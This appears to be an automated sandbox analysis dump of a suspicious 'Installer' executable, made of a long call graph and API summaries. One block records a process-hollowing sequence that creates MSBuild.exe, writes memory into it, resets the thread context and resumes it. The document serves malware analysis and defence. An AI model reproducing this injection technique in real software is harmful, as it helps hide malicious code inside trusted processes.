21363->21485 21364->21310 21372 353ff0 21365->21372 21380 354058 21365->21380 21492 3545ef 21366->21492 21367->21363 21367->21375 21388 354009 21367->21388 21496 35460c 21368->21496 21369->21310 21377 3540ab 21372->21377 21460 35445e 21372->21460 21375->21377 21474 354866 21375->21474 21376->21372 21378 35401c 21376->21378 21376->21388 21383 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21377->21383 21378->21377 21470 3542f4 21378->21470 21380->21363 21382 35405c 21380->21382 21382->21377 21481 354622 21382->21481 21384 3542f2 21383->21384 21384->21310 21387 3541ac 21390 353acb 66 API calls 21387->21390 21392 35421f 21387->21392 21388->21377 21388->21387 21499 353acb 21388->21499 21389 354284 21389->21377 21393 353acb 66 API calls 21389->21393 21390->21387 21392->21389 21503 35f430 21392->21503 21393->21389 21395 353fd6 21394->21395 21396 354042 21394->21396 21399 353fdc 21395->21399 21400 35406a 21395->21400 21397 354047 21396->21397 21398 354081 21396->21398 21401 354049 21397->21401 21402 354078 21397->21402 21403 354086 21398->21403 21404 3540a0 21398->21404 21410 354037 21399->21410 21411 353fe1 21399->21411 21408 354b80 30 API calls 21400->21408 21406 353ff0 21401->21406 21412 354058 21401->21412 21405 3545ef 30 API calls 21402->21405 21403->21400 21403->21410 21423 354009 21403->21423 21407 35460c 30 API calls 21404->21407 21405->21423 21409 35445e 42 API calls 21406->21409 21413 3540ab 21406->21413 21407->21423 21408->21423 21409->21423 21410->21413 21415 354866 30 API calls 21410->21415 21411->21406 21414 35401c 21411->21414 21411->21423 21412->21400 21416 35405c 21412->21416 21418 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21413->21418 21414->21413 21417 3542f4 41 API calls 21414->21417 21415->21423 21416->21413 21420 354622 29 API calls 21416->21420 21417->21423 21419 3542f2 21418->21419 21419->21310 21420->21423 21421 3541ac 21424 35421f 21421->21424 21425 353acb 66 API calls 
21421->21425 21422 353acb 66 API calls 21422->21423 21423->21413 21423->21421 21423->21422 21426 35f430 _Fputc 41 API calls 21424->21426 21428 354284 21424->21428 21425->21421 21426->21424 21427 353acb 66 API calls 21427->21428 21428->21413 21428->21427 21430 353610 21429->21430 21431 35367a 21429->21431 21432 35f704 __fread_nolock 29 API calls 21430->21432 21431->21350 21433 353617 21432->21433 21433->21431 21434 3576e4 __Wcrtomb 14 API calls 21433->21434 21435 35366f 21434->21435 21436 357dcf __strnicoll 29 API calls 21435->21436 21436->21431 21447 354d68 21437->21447 21439 354e01 21441 357f78 _Fputc 29 API calls 21439->21441 21440 354dec 21440->21439 21443 354e34 21440->21443 21446 354e1c std::_Locinfo::_Locinfo_dtor 21440->21446 21441->21446 21442 354ecb 21444 354db1 29 API calls 21442->21444 21443->21442 21454 354db1 21443->21454 21444->21446 21446->21353 21448 354d80 21447->21448 21449 354d6d 21447->21449 21448->21440 21450 3576e4 __Wcrtomb 14 API calls 21449->21450 21451 354d72 21450->21451 21452 357dcf __strnicoll 29 API calls 21451->21452 21453 354d7d 21452->21453 21453->21440 21455 354dd6 21454->21455 21456 354dc2 21454->21456 21455->21442 21456->21455 21457 3576e4 __Wcrtomb 14 API calls 21456->21457 21458 354dcb 21457->21458 21459 357dcf __strnicoll 29 API calls 21458->21459 21459->21455 21461 354478 21460->21461 21513 35477e 21461->21513 21463 3544b7 21524 35e8ff 21463->21524 21466 353790 _Fputc 39 API calls 21467 35456e 21466->21467 21468 353790 _Fputc 39 API calls 21467->21468 21469 3545a1 21467->21469 21468->21469 21469->21388 21469->21469 21471 35430f 21470->21471 21472 354345 21471->21472 21473 35f430 _Fputc 41 API calls 21471->21473 21472->21388 21473->21472 21475 35487b 21474->21475 21476 35489d 21475->21476 21478 3548c4 21475->21478 21477 357f78 _Fputc 29 API calls 21476->21477 21480 3548ba 21477->21480 21479 35477e 15 API calls 21478->21479 21478->21480 21479->21480 21480->21388 21482 354638 21481->21482 21483 357f78 _Fputc 29 API calls 
21482->21483 21484 354659 21482->21484 21483->21484 21484->21388 21486 354b95 21485->21486 21487 354bb7 21486->21487 21489 354bde 21486->21489 21488 357f78 _Fputc 29 API calls 21487->21488 21491 354bd4 21488->21491 21490 35477e 15 API calls 21489->21490 21489->21491 21490->21491 21491->21388 21493 3545fb 21492->21493 21681 3549f3 21493->21681 21495 35460b 21495->21388 21497 354866 30 API calls 21496->21497 21498 354621 21497->21498 21498->21388 21500 353add 21499->21500 21501 358c30 _Fputc 66 API calls 21500->21501 21502 353ae5 21500->21502 21501->21502 21502->21388 21504 35f445 21503->21504 21505 35f486 21504->21505 21507 353790 _Fputc 39 API calls 21504->21507 21510 35f449 __fread_nolock _Fputc 21504->21510 21512 35f472 __fread_nolock 21504->21512 21508 35c021 _Fputc WideCharToMultiByte 21505->21508 21505->21510 21505->21512 21506 357f78 _Fputc 29 API calls 21506->21510 21507->21505 21509 35f541 21508->21509 21509->21510 21511 35f557 GetLastError 21509->21511 21510->21392 21511->21510 21511->21512 21512->21506 21512->21510 21514 3547a5 21513->21514 21515 354793 21513->21515 21514->21515 21516 35bf11 __fread_nolock 15 API calls 21514->21516 21515->21463 21517 3547c9 21516->21517 21518 3547d1 21517->21518 21519 3547dc 21517->21519 21520 35bed7 ___free_lconv_mon 14 API calls 21518->21520 21543 35383d 21519->21543 21520->21515 21523 35bed7 ___free_lconv_mon 14 API calls 21523->21515 21525 35e934 21524->21525 21527 35e910 21524->21527 21525->21527 21528 35e967 21525->21528 21526 357f78 _Fputc 29 API calls 21538 35454a 21526->21538 21527->21526 21529 35e9cf 21528->21529 21531 35e9a0 21528->21531 21530 35e9fd 21529->21530 21532 35e9f8 21529->21532 21554 35ee76 21530->21554 21546 35eab4 21531->21546 21535 35ea25 21532->21535 21536 35ea5f 21532->21536 21539 35ea45 21535->21539 21540 35ea2a 21535->21540 21581 35ec9c 21536->21581 21538->21466 21538->21467 21574 35f291 21539->21574 21564 35f327 21540->21564 21544 35bed7 ___free_lconv_mon 14 API calls 21543->21544 21545 
35384c 21544->21545 21545->21523 21547 35eaca 21546->21547 21548 35ead5 21546->21548 21547->21538 21588 35bb4c 21548->21588 21551 35eb3a 21551->21538 21552 357dfc __Getctype 11 API calls 21553 35eb48 21552->21553 21555 35ee89 21554->21555 21556 35ee98 21555->21556 21557 35eeba 21555->21557 21558 357f78 _Fputc 29 API calls 21556->21558 21559 35eecf 21557->21559 21561 35ef22 21557->21561 21563 35eeb0 __fread_nolock __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z _strrchr __allrem 21558->21563 21560 35ec9c 41 API calls 21559->21560 21560->21563 21562 353790 _Fputc 39 API calls 21561->21562 21561->21563 21562->21563 21563->21538 21597 367792 21564->21597 21575 367792 31 API calls 21574->21575 21576 35f2c0 21575->21576 21577 3675e7 29 API calls 21576->21577 21578 35f301 21577->21578 21579 35f308 21578->21579 21580 35f1a3 39 API calls 21578->21580 21579->21538 21580->21579 21582 367792 31 API calls 21581->21582 21583 35ecc6 21582->21583 21584 3675e7 29 API calls 21583->21584 21585 35ed14 21584->21585 21586 35eb49 41 API calls 21585->21586 21587 35ed1b 21585->21587 21586->21587 21587->21538 21589 35bb68 21588->21589 21590 35bb5a 21588->21590 21591 3576e4 __Wcrtomb 14 API calls 21589->21591 21590->21589 21594 35bb80 21590->21594 21596 35bb70 21591->21596 21592 357dcf __strnicoll 29 API calls 21593 35bb7a 21592->21593 21593->21551 21593->21552 21594->21593 21595 3576e4 __Wcrtomb 14 API calls 21594->21595 21595->21596 21596->21592 21598 3677c6 21597->21598 21599 357343 29 API calls 21598->21599 21601 36782f 21599->21601 21600 36785b 21603 35bb4c ___std_exception_copy 29 API calls 21600->21603 21601->21600 21602 3678ed 21601->21602 21605 3678c8 21601->21605 21606 367888 21601->21606 21604 357343 29 API calls 21602->21604 21607 3678b8 21603->21607 21608 367917 21604->21608 21610 35bb4c ___std_exception_copy 29 API calls 21605->21610 21606->21600 21606->21602 21609 368d6d 21607->21609 21615 3678c3 21607->21615 21611 357343 29 API calls 21608->21611 21612 357dfc __Getctype 11 API 
calls 21609->21612 21610->21607 21613 36792a 21611->21613 21614 368d79 21612->21614 21618 36a4c0 21 API calls 21613->21618 21616 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21615->21616 21617 35f357 21616->21617 21653 3675e7 21617->21653 21619 3679a4 21618->21619 21620 36a660 __floor_pentium4 21 API calls 21619->21620 21621 3679ae 21620->21621 21622 367c0c 21621->21622 21626 367a4c 21621->21626 21631 367ca9 21621->21631 21622->21631 21654 3675f8 21653->21654 21656 36761a 21653->21656 21655 357f78 _Fputc 29 API calls 21654->21655 21658 367610 codecvt 21655->21658 21657 357f78 _Fputc 29 API calls 21656->21657 21656->21658 21657->21658 21682 354a08 21681->21682 21683 354a2a 21682->21683 21685 354a51 21682->21685 21684 357f78 _Fputc 29 API calls 21683->21684 21686 354a47 21684->21686 21685->21686 21687 35477e 15 API calls 21685->21687 21686->21495 21687->21686 21689 3585f8 21688->21689 21690 3585d1 21688->21690 21689->21319 21690->21689 21691 35f704 __fread_nolock 29 API calls 21690->21691 21692 3585ed 21691->21692 21694 363e10 21692->21694 21695 363e1c ___scrt_is_nonwritable_in_current_image 21694->21695 21696 363e5d 21695->21696 21698 363ea3 21695->21698 21704 363e24 21695->21704 21697 357f78 _Fputc 29 API calls 21696->21697 21697->21704 21705 363868 EnterCriticalSection 21698->21705 21700 363ea9 21701 363ec7 21700->21701 21706 363bf4 21700->21706 21734 363f19 21701->21734 21704->21689 21705->21700 21707 363c1c 21706->21707 21733 363c3f __fread_nolock 21706->21733 21708 363c20 21707->21708 21710 363c7b 21707->21710 21709 357f78 _Fputc 29 API calls 21708->21709 21709->21733 21711 363c99 21710->21711 21751 3629a2 21710->21751 21737 363f21 21711->21737 21715 363cb1 21719 363ce0 21715->21719 21720 363cb9 21715->21720 21716 363cf8 21717 363d61 WriteFile 21716->21717 21718 363d0c 21716->21718 21721 363d83 GetLastError 21717->21721 21732 363cf3 21717->21732 21723 363d14 21718->21723 21724 363d4d 21718->21724 21759 363f9e GetConsoleOutputCP 
21719->21759 21720->21733 21754 364365 21720->21754 21721->21732 21725 363d39 21723->21725 21726 363d19 21723->21726 21744 3643cd 21724->21744 21779 364591 21725->21779 21729 363d22 21726->21729 21726->21733 21772 3644a8 21729->21772 21732->21733 21733->21701 21793 36388b LeaveCriticalSection 21734->21793 21736 363f1f 21736->21704 21738 36744f __fread_nolock 29 API calls 21737->21738 21741 363f33 21738->21741 21739 363cab 21739->21715 21739->21716 21740 363f61 21740->21739 21742 363f7b GetConsoleMode 21740->21742 21741->21739 21741->21740 21743 353790 _Fputc 39 API calls 21741->21743 21742->21739 21743->21740 21749 3643dc _Fputc 21744->21749 21745 36448d 21746 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21745->21746 21747 3644a6 21746->21747 21747->21733 21748 36444c WriteFile 21748->21749 21750 36448f GetLastError 21748->21750 21749->21745 21749->21748 21750->21745 21787 362b03 21751->21787 21753 3629bb 21753->21711 21755 3643bc 21754->21755 21756 364387 21754->21756 21755->21733 21756->21755 21757 3643be GetLastError 21756->21757 21758 36a2d1 5 API calls _Fputc 21756->21758 21757->21755 21758->21756 21760 364010 21759->21760 21764 364017 codecvt 21759->21764 21761 353790 _Fputc 39 API calls 21760->21761 21761->21764 21762 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21763 36435e 21762->21763 21763->21732 21765 35f5d1 40 API calls _Fputc 21764->21765 21766 368fd5 5 API calls std::_Locinfo::_Locinfo_dtor 21764->21766 21767 3642cd 21764->21767 21768 35c021 _Fputc WideCharToMultiByte 21764->21768 21769 364246 WriteFile 21764->21769 21771 364284 WriteFile 21764->21771 21765->21764 21766->21764 21767->21762 21767->21767 21768->21764 21769->21764 21770 36433c GetLastError 21769->21770 21770->21767 21771->21764 21771->21770 21773 3644b7 _Fputc 21772->21773 21774 364576 21773->21774 21776 36452c WriteFile 21773->21776 21775 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 
21774->21775 21777 36458f 21775->21777 21776->21773 21778 364578 GetLastError 21776->21778 21777->21733 21778->21774 21786 3645a0 _Fputc 21779->21786 21780 3646a8 21781 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21780->21781 21782 3646c1 21781->21782 21782->21732 21783 35c021 _Fputc WideCharToMultiByte 21783->21786 21784 3646aa GetLastError 21784->21780 21785 36465f WriteFile 21785->21784 21785->21786 21786->21780 21786->21783 21786->21784 21786->21785 21788 36361f _Fputc 29 API calls 21787->21788 21789 362b15 21788->21789 21790 362b31 SetFilePointerEx 21789->21790 21792 362b1d __fread_nolock 21789->21792 21791 362b49 GetLastError 21790->21791 21790->21792 21791->21792 21792->21753 21793->21736 21794->21291 21795 350312 21796 35031e ___scrt_is_nonwritable_in_current_image 21795->21796 21821 34a8ca 21796->21821 21798 350325 21799 35047e 21798->21799 21808 35034f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 21798->21808 21874 34f8e9 IsProcessorFeaturePresent 21799->21874 21801 350485 21856 355545 21801->21856 21804 35555b CallUnexpected 21 API calls 21805 350493 21804->21805 21806 35036e 21807 3503ef 21832 357abc 21807->21832 21808->21806 21808->21807 21859 35558f 21808->21859 21811 3503f5 21836 3424b0 GetConsoleWindow ShowWindow 21811->21836 21813 35040c 21814 34f896 CallUnexpected GetModuleHandleW 21813->21814 21815 350416 21814->21815 21815->21801 21816 35041a 21815->21816 21817 350423 21816->21817 21865 355571 21816->21865 21868 34a903 21817->21868 21822 34a8d3 21821->21822 21878 34f555 IsProcessorFeaturePresent 21822->21878 21826 34a8e4 21827 34a8e8 21826->21827 21888 353230 21826->21888 21827->21798 21830 34a8ff 21830->21798 21833 357ac5 21832->21833 21834 357aca 21832->21834 21960 357be5 21833->21960 21834->21811 21837 34a663 codecvt 3 API calls 21836->21837 21838 3424f3 21837->21838 22444 355349 21838->22444 21840 342513 21841 342554 21840->21841 21842 34251d 21840->21842 21845 34b317 
std::_Throw_Cpp_error 30 API calls 21841->21845 21843 342524 GetCurrentThreadId 21842->21843 21844 34256c 21842->21844 21847 34257d 21843->21847 21848 34252d 21843->21848 21846 34b317 std::_Throw_Cpp_error 30 API calls 21844->21846 21845->21844 21846->21847 21849 34b317 std::_Throw_Cpp_error 30 API calls 21847->21849 22459 34f11d WaitForSingleObjectEx 21848->22459 21851 34258e 21849->21851 21854 34b317 std::_Throw_Cpp_error 30 API calls 21851->21854 21853 342541 21853->21813 21855 34259f 21854->21855 21855->21813 21857 355690 CallUnexpected 21 API calls 21856->21857 21858 35048b 21857->21858 21858->21804 21860 3555a5 ___scrt_is_nonwritable_in_current_image __Getctype 21859->21860 21860->21807 21861 35c16a __Getctype 39 API calls 21860->21861 21862 35a17c 21861->21862 21863 358353 CallUnexpected 39 API calls 21862->21863 21864 35a1a6 21863->21864 21866 355690 CallUnexpected 21 API calls 21865->21866 21867 35557c 21866->21867 21867->21817 21869 34a90f 21868->21869 21870 34a925 21869->21870 22521 353242 21869->22521 21870->21806 21872 34a91d 21873 350ce7 ___scrt_uninitialize_crt 7 API calls 21872->21873 21873->21870 21875 34f8ff __fread_nolock CallUnexpected 21874->21875 21876 34f9aa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 21875->21876 21877 34f9ee CallUnexpected 21876->21877 21877->21801 21879 34a8df 21878->21879 21880 350cc8 21879->21880 21897 35bba6 21880->21897 21883 350cd1 21883->21826 21885 350cd9 21886 350ce4 21885->21886 21911 35bbe2 21885->21911 21886->21826 21951 35e2e9 21888->21951 21891 350ce7 21892 350cf0 21891->21892 21893 350cfa 21891->21893 21894 35acbe ___vcrt_uninitialize_ptd 6 API calls 21892->21894 21893->21827 21895 350cf5 21894->21895 21896 35bbe2 ___vcrt_uninitialize_locks DeleteCriticalSection 21895->21896 21896->21893 21898 35bbaf 21897->21898 21900 35bbd8 21898->21900 21901 350ccd 21898->21901 21915 3668f9 21898->21915 21902 35bbe2 ___vcrt_uninitialize_locks DeleteCriticalSection 21900->21902 21901->21883 21903 
35ac8b 21901->21903 21902->21901 21932 36680a 21903->21932 21906 35aca0 21906->21885 21909 35acbb 21909->21885 21912 35bc0c 21911->21912 21913 35bbed 21911->21913 21912->21883 21914 35bbf7 DeleteCriticalSection 21913->21914 21914->21912 21914->21914 21920 36698b 21915->21920 21918 366931 InitializeCriticalSectionAndSpinCount 21919 36691c 21918->21919 21919->21898 21921 3669ac 21920->21921 21922 366913 21920->21922 21921->21922 21924 366a14 GetProcAddress 21921->21924 21925 366a05 21921->21925 21927 366940 LoadLibraryExW 21921->21927 21922->21918 21922->21919 21924->21922 21925->21924 21926 366a0d FreeLibrary 21925->21926 21926->21924 21928 366957 GetLastError 21927->21928 21929 366987 21927->21929 21928->21929 21930 366962 ___vcrt_FlsGetValue 21928->21930 21929->21921 21930->21929 21931 366978 LoadLibraryExW 21930->21931 21931->21921 21933 36698b ___vcrt_FlsGetValue 5 API calls 21932->21933 21934 366824 21933->21934 21935 36683d TlsAlloc 21934->21935 21936 35ac95 21934->21936 21936->21906 21937 3668bb 21936->21937 21938 36698b ___vcrt_FlsGetValue 5 API calls 21937->21938 21939 3668d5 21938->21939 21940 35acae 21939->21940 21941 3668f0 TlsSetValue 21939->21941 21940->21909 21942 35acbe 21940->21942 21941->21940 21943 35acce 21942->21943 21944 35acc8 21942->21944 21943->21906 21946 366845 21944->21946 21947 36698b ___vcrt_FlsGetValue 5 API calls 21946->21947 21948 36685f 21947->21948 21949 366877 TlsFree 21948->21949 21950 36686b 21948->21950 21949->21950 21950->21943 21952 35e2f9 21951->21952 21953 34a8f1 21951->21953 21952->21953 21955 35da52 21952->21955 21953->21830 21953->21891 21956 35da59 21955->21956 21957 35da9c GetStdHandle 21956->21957 21958 35dafe 21956->21958 21959 35daaf GetFileType 21956->21959 21957->21956 21958->21952 21959->21956 21961 357c04 21960->21961 21962 357bee 21960->21962 21961->21834 21962->21961 21966 357b26 21962->21966 21964 357bfb 21964->21961 21983 357cf3 21964->21983 21967 357b32 21966->21967 21968 357b2f 21966->21968 21992 35db20 
21967->21992 21968->21964 21973 357b43 21975 35bed7 ___free_lconv_mon 14 API calls 21973->21975 21974 357b4f 22019 357c11 21974->22019 21977 357b49 21975->21977 21977->21964 21979 35bed7 ___free_lconv_mon 14 API calls 21980 357b73 21979->21980 21981 35bed7 ___free_lconv_mon 14 API calls 21980->21981 21982 357b79 21981->21982 21982->21964 21984 357d64 21983->21984 21990 357d02 21983->21990 21984->21961 21985 35c021 WideCharToMultiByte _Fputc 21985->21990 21986 35d2b4 __Getctype 14 API calls 21986->21990 21987 357d68 21988 35bed7 ___free_lconv_mon 14 API calls 21987->21988 21988->21984 21990->21984 21990->21985 21990->21986 21990->21987 21991 35bed7 ___free_lconv_mon 14 API calls 21990->21991 22232 363295 21990->22232 21991->21990 21993 357b38 21992->21993 21994 35db29 21992->21994 21998 3631be GetEnvironmentStringsW 21993->21998 22041 35c225 21994->22041 21999 3631d6 21998->21999 22012 357b3d 21998->22012 22000 35c021 _Fputc WideCharToMultiByte 21999->22000 22001 3631f3 22000->22001 22002 3631fd FreeEnvironmentStringsW 22001->22002 22003 363208 22001->22003 22002->22012 22004 35bf11 __fread_nolock 15 API calls 22003->22004 22005 36320f 22004->22005 22006 363217 22005->22006 22007 363228 22005->22007 22008 35bed7 ___free_lconv_mon 14 API calls 22006->22008 22009 35c021 _Fputc WideCharToMultiByte 22007->22009 22010 36321c FreeEnvironmentStringsW 22008->22010 22011 363238 22009->22011 22010->22012 22013 363247 22011->22013 22014 36323f 22011->22014 22012->21973 22012->21974 22015 35bed7 ___free_lconv_mon 14 API calls 22013->22015 22016 35bed7 ___free_lconv_mon 14 API calls 22014->22016 22017 363245 FreeEnvironmentStringsW 22015->22017 22016->22017 22017->22012 22020 357c26 22019->22020 22021 35d2b4 __Getctype 14 API calls 22020->22021 22022 357c4d 22021->22022 22023 357c55 22022->22023 22029 357c5f 22022->22029 22024 35bed7 ___free_lconv_mon 14 API calls 22023->22024 22025 357b56 22024->22025 22025->21979 22026 357cbc 22027 35bed7 ___free_lconv_mon 14 API calls 
22026->22027 22027->22025 22028 35d2b4 __Getctype 14 API calls 22028->22029 22029->22026 22029->22028 22030 357ccb 22029->22030 22032 35bb4c ___std_exception_copy 29 API calls 22029->22032 22035 357ce6 22029->22035 22037 35bed7 ___free_lconv_mon 14 API calls 22029->22037 22226 357bb6 22030->22226 22032->22029 22034 35bed7 ___free_lconv_mon 14 API calls 22036 357cd8 22034->22036 22038 357dfc __Getctype 11 API calls 22035->22038 22039 35bed7 ___free_lconv_mon 14 API calls 22036->22039 22037->22029 22040 357cf2 22038->22040 22039->22025 22042 35c230 22041->22042 22043 35c236 22041->22043 22045 35cb94 __Getctype 6 API calls 22042->22045 22044 35cbd3 __Getctype 6 API calls 22043->22044 22047 35c23c 22043->22047 22046 35c250 22044->22046 22045->22043 22046->22047 22048 35d2b4 __Getctype 14 API calls 22046->22048 22049 358353 CallUnexpected 39 API calls 22047->22049 22050 35c241 22047->22050 22051 35c260 22048->22051 22052 35c2ba 22049->22052 22066 35dee1 22050->22066 22053 35c27d 22051->22053 22054 35c268 22051->22054 22056 35cbd3 __Getctype 6 API calls 22053->22056 22055 35cbd3 __Getctype 6 API calls 22054->22055 22057 35c274 22055->22057 22058 35c289 22056->22058 22062 35bed7 ___free_lconv_mon 14 API calls 22057->22062 22059 35c28d 22058->22059 22060 35c29c 22058->22060 22063 35cbd3 __Getctype 6 API calls 22059->22063 22061 35c47c __Getctype 14 API calls 22060->22061 22064 35c2a7 22061->22064 22062->22047 22063->22057 22065 35bed7 ___free_lconv_mon 14 API calls 22064->22065 22065->22050 22067 35df0b 22066->22067 22088 35dd6d 22067->22088 22070 35df24 22070->21993 22071 35bf11 __fread_nolock 15 API calls 22072 35df35 22071->22072 22073 35df3d 22072->22073 22074 35df4b 22072->22074 22076 35bed7 ___free_lconv_mon 14 API calls 22073->22076 22095 35db68 22074->22095 22076->22070 22078 35df83 22079 3576e4 __Wcrtomb 14 API calls 22078->22079 22080 35df88 22079->22080 22083 35bed7 ___free_lconv_mon 14 API calls 22080->22083 22081 35dfca 22082 35e013 22081->22082 22106 35e29c 
22081->22106 22086 35bed7 ___free_lconv_mon 14 API calls 22082->22086 22083->22070 22084 35df9e 22084->22081 22087 35bed7 ___free_lconv_mon 14 API calls 22084->22087 22086->22070 22087->22081 22114 35297a 22088->22114 22091 35dda0 22093 35ddb7 22091->22093 22094 35dda5 GetACP 22091->22094 22092 35dd8e GetOEMCP 22092->22093 22093->22070 22093->22071 22094->22093 22096 35dd6d 41 API calls 22095->22096 22097 35db88 22096->22097 22098 35dc8d 22097->22098 22100 35dbc5 IsValidCodePage 22097->22100 22105 35dbe0 __fread_nolock 22097->22105 22099 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 22098->22099 22102 35dd6b 22099->22102 22100->22098 22101 35dbd7 22100->22101 22103 35dc00 GetCPInfo 22101->22103 22101->22105 22102->22078 22102->22084 22103->22098 22103->22105 22126 35e0f7 22105->22126 22107 35e2a8 ___scrt_is_nonwritable_in_current_image 22106->22107 22200 3580e1 EnterCriticalSection 22107->22200 22109 35e2b2 22201 35e036 22109->22201 22115 352991 22114->22115 22116 352998 22114->22116 22115->22091 22115->22092 22116->22115 22117 35c16a __Getctype 39 API calls 22116->22117 22118 3529b9 22117->22118 22119 35c74e __Getctype 39 API calls 22118->22119 22120 3529cf 22119->22120 22122 35c77b 22120->22122 22123 35c7a3 22122->22123 22124 35c78e 22122->22124 22123->22115 22124->22123 22125 35db02 __strnicoll 39 API calls 22124->22125 22125->22123 22127 35e11f GetCPInfo 22126->22127 22136 35e1e8 22126->22136 22132 35e137 22127->22132 22127->22136 22128 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 22130 35e29a 22128->22130 22130->22098 22137 35d5a0 22132->22137 22136->22128 22138 35297a __strnicoll 39 API calls 22137->22138 22139 35d5c0 22138->22139 22157 35bf5f 22139->22157 22141 35d67c 22144 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 22141->22144 22142 35d674 22160 34fe0b 22142->22160 22143 35d5ed 22143->22141 22143->22142 22146 35bf11 __fread_nolock 15 API calls 22143->22146 

Control-flow Graph

APIs
• CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0037A110,0037A100), ref: 0037A334
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0037A347
• Wow64GetThreadContext.KERNEL32(000002B8,00000000), ref: 0037A365
• ReadProcessMemory.KERNELBASE(000002B4,?,0037A154,00000004,00000000), ref: 0037A389
• VirtualAllocEx.KERNELBASE(000002B4,?,?,00003000,00000040), ref: 0037A3B4
• TerminateProcess.KERNELBASE(000002B4,00000000), ref: 0037A3D3
• WriteProcessMemory.KERNELBASE(000002B4,00000000,?,?,00000000,?), ref: 0037A40C
• WriteProcessMemory.KERNELBASE(000002B4,00400000,?,?,00000000,?,00000028), ref: 0037A457
• WriteProcessMemory.KERNELBASE(000002B4,?,?,00000004,00000000), ref: 0037A495
• Wow64SetThreadContext.KERNEL32(000002B8,032B0000), ref: 0037A4D1
• ResumeThread.KERNELBASE(000002B8), ref: 0037A4E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
• API String ID: 2440066154-3857624555
• Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction ID: 549bc118f5f50fd8d8a5eb605d7098f349ce8d303b309335ae4d8d0457d2ed12
• Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction Fuzzy Hash: 6BB1077660064AAFDB60CF68CC80BDA73A5FF88714F158524EA0CAB341D774FA51CB94

Control-flow Graph

APIs
  • Part of subcall function 00341240: _strlen.LIBCMT ref: 003412BA
• CreateFileA.KERNELBASE ref: 00342036
• GetFileSize.KERNEL32(00000000,00000000), ref: 00342046
• ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0034206B
• CloseHandle.KERNELBASE(00000000), ref: 0034207A
• _strlen.LIBCMT ref: 003420CD
• CloseHandle.KERNEL32(00000000), ref: 003421FD
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: File$CloseHandle_strlen$CreateReadSize
• String ID:
• API String ID: 2911764282-0
• Opcode ID: 5f51098b35952cafcf61c8b906805e299bb77ce8e53e764ba8c0260528e33cd9
• Instruction ID: b9aa5d24326e26988dc5b3429dede176647a62f2cdeb772af169db629587cc50
• Opcode Fuzzy Hash: 5f51098b35952cafcf61c8b906805e299bb77ce8e53e764ba8c0260528e33cd9
• Instruction Fuzzy Hash: 5471D0B2C006089BCB12DFA4DC45BAEBBF5BF48314F150629F814BB391E775A945CBA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
